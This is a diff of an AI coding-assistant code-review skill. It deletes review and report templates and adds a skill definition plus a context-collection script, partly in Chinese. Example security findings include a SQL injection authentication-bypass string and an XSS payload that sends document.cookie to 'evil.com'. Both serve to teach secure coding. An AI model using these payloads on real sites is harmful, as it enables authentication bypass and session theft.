||||
|
||||
```markdown
|
||||
### 🟠 [BP-002] N+1 Query Pattern
|
||||
|
||||
**File**: `src/api/orders.ts:45`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: A database query is executed inside the loop, causing an N+1 query problem. For 100 orders, this issues 101 database queries instead of 2.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
const orders = await Order.findAll();
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
order.userName = user.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Batch query all users at once
|
||||
const orders = await Order.findAll();
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
|
||||
// Create lookup map for O(1) access
|
||||
const userMap = new Map(users.map(u => [u.id, u]));
|
||||
|
||||
// Enrich orders with user data
|
||||
for (const order of orders) {
|
||||
order.userName = userMap.get(order.userId)?.name;
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces the number of database queries from N+1 to 2, significantly improving performance for large datasets.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Missing Documentation
|
||||
|
||||
```markdown
|
||||
### 🟡 [BP-003] Missing Documentation
|
||||
|
||||
**File**: `src/services/PaymentService.ts:23`
|
||||
**Category**: Maintainability
|
||||
|
||||
**Issue**: Exported class lacks documentation, making it difficult for other developers to understand its purpose and usage.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
export class PaymentService {
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
/**
|
||||
* Service for processing payment transactions
|
||||
*
|
||||
* Handles payment processing, refunds, and transaction logging.
|
||||
* Integrates with Stripe payment gateway.
|
||||
*
|
||||
* @example
|
||||
* const paymentService = new PaymentService();
|
||||
* const result = await paymentService.processPayment('order-123', 99.99);
|
||||
*/
|
||||
export class PaymentService {
|
||||
/**
|
||||
* Process a payment for an order
|
||||
*
|
||||
* @param orderId - Unique order identifier
|
||||
* @param amount - Payment amount in USD
|
||||
* @returns Payment confirmation with transaction ID
|
||||
* @throws {PaymentError} If payment processing fails
|
||||
*/
|
||||
async processPayment(orderId: string, amount: number) {
|
||||
// implementation
|
||||
}
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Improves code discoverability and reduces onboarding time for new developers.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: Memory Leak
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-004] Potential Memory Leak
|
||||
|
||||
**File**: `src/components/Chat.tsx:56`
|
||||
**Category**: Performance
|
||||
|
||||
**Issue**: WebSocket event listener is added without cleanup; the listener persists after the component unmounts, leaking memory and firing duplicate handlers across remounts.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
useEffect(() => {
|
||||
socket.on('message', handleMessage);
|
||||
|
||||
// Cleanup on unmount
|
||||
return () => {
|
||||
socket.off('message', handleMessage);
|
||||
};
|
||||
}, []);
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Prevents memory leaks and improves application stability in long-running sessions.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Guidelines
|
||||
|
||||
### High
|
||||
- Major performance impact (N+1 queries, O(n²) algorithms)
|
||||
- Critical maintainability issues (complexity > 15)
|
||||
- Missing error handling in critical paths
|
||||
|
||||
### Medium
|
||||
- Moderate performance impact
|
||||
- Code quality issues (complexity 11-15, duplication)
|
||||
- Missing tests for important features
|
||||
|
||||
### Low
|
||||
- Minor style violations
|
||||
- Missing documentation
|
||||
- Low-impact dead code
|
||||
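One way to approximate these guidelines in code is sketched below; the complexity thresholds come from the lists above, while the `type` strings and anything beyond the stated thresholds are illustrative assumptions:

```javascript
// Map a best-practice finding to a severity bucket based on the guidelines above.
function classifySeverity(finding) {
  if (finding.type === 'n-plus-one-query' ||
      finding.complexity > 15 ||
      finding.type === 'missing-error-handling-critical-path') {
    return 'high';
  }
  if ((finding.complexity >= 11 && finding.complexity <= 15) ||
      finding.type === 'duplication' ||
      finding.type === 'missing-tests') {
    return 'medium';
  }
  // Style violations, missing documentation, low-impact dead code
  return 'low';
}
```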
@@ -1,316 +0,0 @@
|
||||
# Report Template
|
||||
|
||||
## Main Report Structure (REPORT.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
---
|
||||
|
||||
## 📊 Executive Summary
|
||||
|
||||
### Overall Assessment
|
||||
|
||||
{Brief 2-3 paragraph assessment of code health}
|
||||
|
||||
### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
|
||||
|
||||
{Risk assessment based on findings severity and count}
|
||||
|
||||
### Key Statistics
|
||||
|
||||
| Metric | Value | Status |
|
||||
|--------|-------|--------|
|
||||
| Total Files | {count} | - |
|
||||
| Files with Issues | {count} | {percentage}% |
|
||||
| Critical Findings | {count} | {icon} |
|
||||
| High Findings | {count} | {icon} |
|
||||
| Medium Findings | {count} | {icon} |
|
||||
| Low Findings | {count} | {icon} |
|
||||
|
||||
### Category Breakdown
|
||||
|
||||
| Category | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Security | {count} | {percentage}% |
|
||||
| Code Quality | {count} | {percentage}% |
|
||||
| Performance | {count} | {percentage}% |
|
||||
| Maintainability | {count} | {percentage}% |
|
||||
|
||||
---
|
||||
|
||||
## 🎯 Quality Scores
|
||||
|
||||
### Security Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Code Quality Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Performance Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Maintainability Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Overall Score: {score}/100
|
||||
|
||||
**Grade**: {A|B|C|D|F}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Findings (Requires Immediate Action)
|
||||
|
||||
{List all critical findings using security-finding.md template}
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Findings
|
||||
|
||||
{List all high findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Findings
|
||||
|
||||
{List all medium findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Findings
|
||||
|
||||
{List all low findings}
|
||||
|
||||
---
|
||||
|
||||
## 📋 Action Plan
|
||||
|
||||
### Immediate (Within 24 hours)
|
||||
1. {Critical issue 1}
|
||||
2. {Critical issue 2}
|
||||
3. {Critical issue 3}
|
||||
|
||||
### Short-term (Within 1 week)
|
||||
1. {High priority issue 1}
|
||||
2. {High priority issue 2}
|
||||
...
|
||||
|
||||
### Medium-term (Within 1 month)
|
||||
1. {Medium priority issue 1}
|
||||
2. {Medium priority issue 2}
|
||||
...
|
||||
|
||||
### Long-term (Within 3 months)
|
||||
1. {Low priority issue 1}
|
||||
2. {Improvement initiative 1}
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## 📊 Metrics Dashboard
|
||||
|
||||
### Code Health Trends
|
||||
|
||||
{If historical data available, show trends}
|
||||
|
||||
### File Hotspots
|
||||
|
||||
Top files with most issues:
|
||||
1. `{file-path}` - {count} issues ({severity breakdown})
|
||||
2. `{file-path}` - {count} issues
|
||||
...
|
||||
|
||||
### Technology Breakdown
|
||||
|
||||
Issues by language/framework:
|
||||
- TypeScript: {count} issues
|
||||
- Python: {count} issues
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## ✅ Compliance Status
|
||||
|
||||
### PCI DSS
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### HIPAA
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### GDPR
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
---
|
||||
|
||||
## 📚 Appendix
|
||||
|
||||
### A. Review Configuration
|
||||
|
||||
\`\`\`json
|
||||
{review-config}
|
||||
\`\`\`
|
||||
|
||||
### B. Tools and Versions
|
||||
|
||||
- Code Reviewer Skill: v1.0.0
|
||||
- Security Rules: OWASP Top 10 2021, CWE Top 25
|
||||
- Languages Analyzed: {list}
|
||||
|
||||
### C. References
|
||||
|
||||
- [OWASP Top 10 2021](https://owasp.org/Top10/)
|
||||
- [CWE Top 25](https://cwe.mitre.org/top25/)
|
||||
- {additional references}
|
||||
|
||||
### D. Full Findings Index
|
||||
|
||||
{Links to detailed finding JSONs}
|
||||
```
|
||||
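The template above reports a numeric overall score and a letter grade; one possible score-to-grade mapping is sketched below (the thresholds are assumptions, not specified by the template):

```javascript
// Convert a 0-100 overall score into the A-F grade used in the report header.
function scoreToGrade(score) {
  if (score >= 90) return 'A';
  if (score >= 80) return 'B';
  if (score >= 70) return 'C';
  if (score >= 60) return 'D';
  return 'F';
}
// e.g. an overall score of 74 maps to grade "C", matching the sample summary.json below.
```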
|
||||
---
|
||||
|
||||
## Fix Checklist Template (FIX-CHECKLIST.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Total Items**: {count}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
|
||||
- Effort: 1 hour
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
|
||||
- Effort: 30 minutes
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
|
||||
- Effort: 2 hours
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
|
||||
- Effort: 1 hour
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Issues (Fix This Month)
|
||||
|
||||
{List medium priority items}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Issues (Fix Next Release)
|
||||
|
||||
{List low priority items}
|
||||
|
||||
---
|
||||
|
||||
## Progress Tracking
|
||||
|
||||
**Overall Progress**: {completed}/{total} ({percentage}%)
|
||||
|
||||
- Critical: {completed}/{total}
|
||||
- High: {completed}/{total}
|
||||
- Medium: {completed}/{total}
|
||||
- Low: {completed}/{total}
|
||||
|
||||
**Estimated Total Effort**: {hours} hours
|
||||
**Estimated Completion**: {date}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Summary JSON Template (summary.json)
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"files_with_issues": 89,
|
||||
"total_findings": 69,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 13,
|
||||
"medium": 30,
|
||||
"low": 23
|
||||
},
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"grade": "C",
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true,
|
||||
"compliance": {
|
||||
"pci_dss": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
|
||||
},
|
||||
"hipaa": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-005", "SEC-009"]
|
||||
},
|
||||
"gdpr": {
|
||||
"status": "PARTIAL",
|
||||
"affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
|
||||
}
|
||||
},
|
||||
"top_issues": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145
|
||||
}
|
||||
],
|
||||
"hotspots": [
|
||||
{
|
||||
"file": "src/auth/user-service.ts",
|
||||
"issues": 5,
|
||||
"severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
|
||||
}
|
||||
],
|
||||
"effort_estimate": {
|
||||
"critical": 4.5,
|
||||
"high": 18,
|
||||
"medium": 35,
|
||||
"low": 12,
|
||||
"total_hours": 69.5
|
||||
}
|
||||
}
|
||||
```
|
||||
@@ -1,161 +0,0 @@
|
||||
# Security Finding Template
|
||||
|
||||
Use this template for documenting security vulnerabilities.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "SEC-{number}",
|
||||
"type": "{vulnerability-type}",
|
||||
"severity": "{critical|high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"column": {column-number},
|
||||
"code": "{vulnerable-code-snippet}",
|
||||
"message": "{clear-description-of-issue}",
|
||||
"cwe": "CWE-{number}",
|
||||
"owasp": "A{number}:2021 - {category}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"fix_example": "{corrected-code}"
|
||||
},
|
||||
"references": [
|
||||
"https://...",
|
||||
"https://..."
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-{number}] {Vulnerability Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`{language}
|
||||
{vulnerable-code-snippet}
|
||||
\`\`\`
|
||||
|
||||
**Issue**: {Detailed explanation of the vulnerability and potential impact}
|
||||
|
||||
**Attack Example** (if applicable):
|
||||
\`\`\`
|
||||
{example-attack-payload}
|
||||
Result: {what-happens}
|
||||
Effect: {security-impact}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{corrected-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [{reference-title}]({url})
|
||||
- [{reference-title}]({url})
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Icon Mapping
|
||||
|
||||
- Critical: 🔴
|
||||
- High: 🟠
|
||||
- Medium: 🟡
|
||||
- Low: 🟢
|
||||
|
||||
## Example: SQL Injection Finding
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: XSS Finding
|
||||
|
||||
```markdown
|
||||
### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
|
||||
|
||||
**File**: `src/components/CommentList.tsx:89`
|
||||
**CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`tsx
|
||||
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User-generated content rendered without sanitization, allowing script injection.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
|
||||
Effect: Steals user session cookies
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
import DOMPurify from 'dompurify';
|
||||
|
||||
// Sanitize HTML before rendering
|
||||
<div dangerouslySetInnerHTML={{
|
||||
__html: DOMPurify.sanitize(comment.body)
|
||||
}} />
|
||||
|
||||
// Or use text content (if HTML not needed)
|
||||
<div>{comment.body}</div>
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
|
||||
- [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Compliance Mapping Template
|
||||
|
||||
When finding affects compliance:
|
||||
|
||||
```markdown
|
||||
**Compliance Impact**:
|
||||
- **PCI DSS**: Requirement 6.5.1 (Injection flaws)
|
||||
- **HIPAA**: Technical Safeguards - Access Control
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
```
|
||||
.claude/skills/review-code/SKILL.md (new file, +170 lines)
@@ -0,0 +1,170 @@
|
||||
---
|
||||
name: review-code
|
||||
description: Multi-dimensional code review with structured reports. Analyzes correctness, readability, performance, security, testing, and architecture. Triggers on "review code", "code review", "审查代码", "代码审查".
|
||||
allowed-tools: Task, AskUserQuestion, Read, Write, Glob, Grep, Bash, mcp__ace-tool__search_context, mcp__ide__getDiagnostics
|
||||
---
|
||||
|
||||
# Review Code
|
||||
|
||||
Multi-dimensional code review skill that analyzes code across 6 key dimensions and generates structured review reports with actionable recommendations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置) │
|
||||
│ → 阅读 specs/review-dimensions.md │
|
||||
│ → 理解审查维度和问题分类标准 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator (状态驱动决策) │
|
||||
│ → 读取状态 → 选择审查动作 → 执行 → 更新状态 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
│
|
||||
┌───────────┼───────────┬───────────┬───────────┐
|
||||
↓ ↓ ↓ ↓ ↓
|
||||
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
|
||||
│ Collect │ │ Quick │ │ Deep │ │ Report │ │Complete │
|
||||
│ Context │ │ Scan │ │ Review │ │ Generate│ │ │
|
||||
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
|
||||
↓ ↓ ↓ ↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Review Dimensions │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │Correctness│ │Readability│ │Performance│ │ Security │ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Testing │ │Architecture│ │
|
||||
│ └──────────┘ └──────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Key Design Principles
|
||||
|
||||
1. **Multi-dimensional review**: covers six dimensions - correctness, readability, performance, security, test coverage, and architectural consistency
2. **Layered execution**: a quick scan flags high-risk areas, then deep review focuses on the key issues
3. **Structured reporting**: findings are grouped by severity, with file locations and fix recommendations
4. **State-driven**: autonomous mode selects the next action dynamically based on review progress
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ Do not skip**: the following documents **must** be read in full before performing any review action.
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度定义和检查点 | **P0 - 最高** |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类和严重程度标准 | **P0 - 最高** |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 审查质量标准 | P1 |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/review-report.md](templates/review-report.md) | 审查报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题记录模板 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 0: Specification Study (强制前置 - 禁止跳过) │
|
||||
│ → Read: specs/review-dimensions.md │
|
||||
│ → Read: specs/issue-classification.md │
|
||||
│ → 理解审查标准和问题分类 │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: collect-context │
|
||||
│ → 收集目标文件/目录 │
|
||||
│ → 识别技术栈和语言 │
|
||||
│ → Output: state.context (files, language, framework) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: quick-scan │
|
||||
│ → 快速扫描整体结构 │
|
||||
│ → 识别高风险区域 │
|
||||
│ → Output: state.risk_areas, state.scan_summary │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: deep-review (per dimension) │
|
||||
│ → 逐维度深入审查 │
|
||||
│ → 记录发现的问题 │
|
||||
│ → Output: state.findings[] │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: generate-report │
|
||||
│ → 汇总所有发现 │
|
||||
│ → 生成结构化报告 │
|
||||
│ → Output: review-report.md │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: complete │
|
||||
│ → 保存最终状态 │
|
||||
│ → 输出审查摘要 │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Directory Setup
|
||||
|
||||
```javascript
|
||||
const timestamp = new Date().toISOString().slice(0,19).replace(/[-:T]/g, '');
|
||||
const workDir = `.workflow/.scratchpad/review-code-${timestamp}`;
|
||||
|
||||
Bash(`mkdir -p "${workDir}"`);
|
||||
Bash(`mkdir -p "${workDir}/findings"`);
|
||||
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
|
||||
.workflow/.scratchpad/review-code-{timestamp}/
|
||||
├── state.json # 审查状态
|
||||
├── context.json # 目标上下文
|
||||
├── findings/ # 问题发现
|
||||
│ ├── correctness.json
|
||||
│ ├── readability.json
|
||||
│ ├── performance.json
|
||||
│ ├── security.json
|
||||
│ ├── testing.json
|
||||
│ └── architecture.json
|
||||
└── review-report.md # 最终审查报告
|
||||
```
|
||||
|
||||
## Review Dimensions
|
||||
|
||||
| Dimension | Focus Areas | Key Checks |
|
||||
|-----------|-------------|------------|
|
||||
| **Correctness** | 逻辑正确性 | 边界条件、错误处理、null 检查 |
|
||||
| **Readability** | 代码可读性 | 命名规范、函数长度、注释质量 |
|
||||
| **Performance** | 性能效率 | 算法复杂度、I/O 优化、资源使用 |
|
||||
| **Security** | 安全性 | 注入风险、敏感信息、权限控制 |
|
||||
| **Testing** | 测试覆盖 | 测试充分性、边界覆盖、可维护性 |
|
||||
| **Architecture** | 架构一致性 | 设计模式、分层结构、依赖管理 |
|
||||
|
||||
## Issue Severity Levels
|
||||
|
||||
| Level | Prefix | Description | Action Required |
|
||||
|-------|--------|-------------|-----------------|
|
||||
| **Critical** | [C] | 阻塞性问题,必须立即修复 | Must fix before merge |
|
||||
| **High** | [H] | 重要问题,需要修复 | Should fix |
|
||||
| **Medium** | [M] | 建议改进 | Consider fixing |
|
||||
| **Low** | [L] | 可选优化 | Nice to have |
|
||||
| **Info** | [I] | 信息性建议 | For reference |
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/orchestrator.md](phases/orchestrator.md) | 审查编排器 |
|
||||
| [phases/state-schema.md](phases/state-schema.md) | 状态结构定义 |
|
||||
| [phases/actions/action-collect-context.md](phases/actions/action-collect-context.md) | 收集上下文 |
|
||||
| [phases/actions/action-quick-scan.md](phases/actions/action-quick-scan.md) | 快速扫描 |
|
||||
| [phases/actions/action-deep-review.md](phases/actions/action-deep-review.md) | 深入审查 |
|
||||
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | 生成报告 |
|
||||
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | 完成审查 |
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度规范 |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类标准 |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 质量标准 |
|
||||
| [templates/review-report.md](templates/review-report.md) | 报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题模板 |
|
||||
@@ -0,0 +1,139 @@
|
||||
# Action: Collect Context
|
||||
|
||||
收集审查目标的上下文信息。
|
||||
|
||||
## Purpose
|
||||
|
||||
在开始审查前,收集目标代码的基本信息:
|
||||
- 确定审查范围(文件/目录)
|
||||
- 识别编程语言和框架
|
||||
- 统计代码规模
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'pending' || state.context === null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
// 1. 询问用户审查目标
|
||||
const input = await AskUserQuestion({
|
||||
questions: [{
|
||||
question: "请指定要审查的代码路径:",
|
||||
header: "审查目标",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "当前目录", description: "审查当前工作目录下的所有代码" },
|
||||
{ label: "src/", description: "审查 src/ 目录" },
|
||||
{ label: "手动指定", description: "输入自定义路径" }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
const targetPath = input["审查目标"] === "手动指定"
|
||||
? input["其他"]
|
||||
: input["审查目标"] === "当前目录" ? "." : "src/";
|
||||
|
||||
// 2. 收集文件列表
|
||||
const files = Glob(`${targetPath}/**/*.{ts,tsx,js,jsx,py,java,go,rs,cpp,c,cs}`);
|
||||
|
||||
// 3. 检测主要语言
|
||||
const languageCounts = {};
|
||||
files.forEach(file => {
|
||||
const ext = file.split('.').pop();
|
||||
const langMap = {
|
||||
'ts': 'TypeScript', 'tsx': 'TypeScript',
|
||||
'js': 'JavaScript', 'jsx': 'JavaScript',
|
||||
'py': 'Python',
|
||||
'java': 'Java',
|
||||
'go': 'Go',
|
||||
'rs': 'Rust',
|
||||
'cpp': 'C++', 'c': 'C',
|
||||
'cs': 'C#'
|
||||
};
|
||||
const lang = langMap[ext] || 'Unknown';
|
||||
languageCounts[lang] = (languageCounts[lang] || 0) + 1;
|
||||
});
|
||||
|
||||
const primaryLanguage = Object.entries(languageCounts)
|
||||
.sort((a, b) => b[1] - a[1])[0]?.[0] || 'Unknown';
|
||||
|
||||
// 4. 统计代码行数
|
||||
let totalLines = 0;
|
||||
for (const file of files.slice(0, 100)) { // 限制前100个文件
|
||||
try {
|
||||
const content = Read(file);
|
||||
totalLines += content.split('\n').length;
|
||||
} catch (e) {}
|
||||
}
|
||||
|
||||
// 5. 检测框架
|
||||
let framework = null;
|
||||
  try {
    // Read package.json directly: the Glob above only matches source files,
    // so package.json can never appear in `files`
    const pkg = JSON.parse(Read('package.json'));
    if (pkg.dependencies?.next) framework = 'Next.js';   // check before React: Next.js apps also depend on react
    else if (pkg.dependencies?.react) framework = 'React';
    else if (pkg.dependencies?.vue) framework = 'Vue';
    else if (pkg.dependencies?.['@angular/core']) framework = 'Angular';
    else if (pkg.dependencies?.express) framework = 'Express';
  } catch (e) {
    // No package.json or it could not be parsed - leave framework as null
  }
|
||||
|
||||
// 6. 构建上下文
|
||||
const context = {
|
||||
target_path: targetPath,
|
||||
files: files.slice(0, 200), // 限制最多200个文件
|
||||
language: primaryLanguage,
|
||||
framework: framework,
|
||||
total_lines: totalLines,
|
||||
file_count: files.length
|
||||
};
|
||||
|
||||
// 7. 保存上下文
|
||||
Write(`${workDir}/context.json`, JSON.stringify(context, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'running',
|
||||
context: context
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
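A hypothetical `context.json` produced by this action (paths and counts are invented), shown as a JavaScript literal:

```javascript
// Shape mirrors the `context` object built in step 6 above.
const exampleContext = {
  target_path: "src/",
  files: ["src/index.ts", "src/api/orders.ts" /* ... up to 200 entries ... */],
  language: "TypeScript",
  framework: "Express",
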